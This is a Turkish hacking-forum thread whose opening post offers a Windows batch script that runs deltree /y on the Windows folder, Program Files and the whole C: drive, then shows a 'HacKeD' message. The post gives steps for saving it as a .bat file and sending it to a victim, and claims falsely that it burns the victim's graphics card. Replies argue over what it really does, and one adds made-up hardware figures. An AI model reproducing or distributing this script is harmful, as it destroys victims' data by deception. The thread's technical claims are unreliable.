Ekran Karti Yakma(alinti)program Bile Değil Işimizi Yazilarla Hallediyoruz

ANKET CVPI

  • BEGENDİM

    Oy: 2 66.7%
  • BEGENMEDİM

    Oy: 1 33.3%

  • Kullanılan toplam oy
    3
  • Anket kapatılmış .

ZoRRoKiN

Özel Üye
7 Ağu 2005
2,149
376
WORLD
YAPACAGINIZ İŞLEM

@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: HacKeD gülümse ::.
@echo off3.

METİN SAYFASI AÇIP
kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By MaNNeR_Boi yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin.
 

3333

Emektar
27 Ara 2005
3,212
45
Little Town.
ewet geçerli bu donanıma zarar weririr trojen keyloger işletim sistemine deep freeze işletim sistemini dondurur sadece..
 

tutku

Katılımcı Üye
27 Nis 2007
261
0
T.H.T
kardes boyle seyler cok werildi ama kendi pc imde actım hiçbirsey olmadı bu işe yarıyomu
 

clark015

Katılımcı Üye
24 Haz 2007
479
6
31
wwW.TuRkHacKtEam.oRG
BU KODLAR İŞE YARICAĞINI HİÇ SANMIYORUM EKRAN KARTINIMI YAKACAKMIŞ İNANMAM DENEYİN GÖRÜN BENİMKİ HALE SAĞLAM ama yine siz bilirsiniz vistada olmadı belki xp içindir .
 

simyaci23

Yeni üye
15 Eyl 2007
11
0
adam format kodu vermiyo direk sistem dosyalarını sildiriyo ve yakmayla alakaszı bu kodlar bi kere kardeş ekran kartına bilgi göndermiyo bile eğer donanım yakmak istiyorsak donanımın kaldıramayacağı kadar sık komut göndermek lazım mesela asus 865 chipset li anakrtlar 63795 komut kaldırabiliyo saniyede asus sitesinden bile okuyabilirsin anakart yakmak için saniyede 64000(yuvarlak hesap) komut göndermek lazım ayrıca cmd komut sistemi bu kadar sık komutu desteklemez bi programlama diliyle yapmak lazım bu işleri mesela ben vbasic vbasic.net dilleriyle uğraşıyorum harika şeyler yaratıyorum bence iyi bi hacker aynı zaman da iyi bir programcı olmalıdır böylece bilmediniz komutlarla uğraşmazsınız ayrıca kendi mantığınızı kullanırsınız
Belliki arkadaşım alıntı yapmışsın paylaşım için yinede sağol saygılar...
 

freeboy_06

Katılımcı Üye
3 Ağu 2007
392
3
39
dostum bırıncısı bu kodu ben verdım ıyı bak ıkıncısı bu kod ıslemcı yakmaz format atar bılmıosun barı alıntı yaz
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.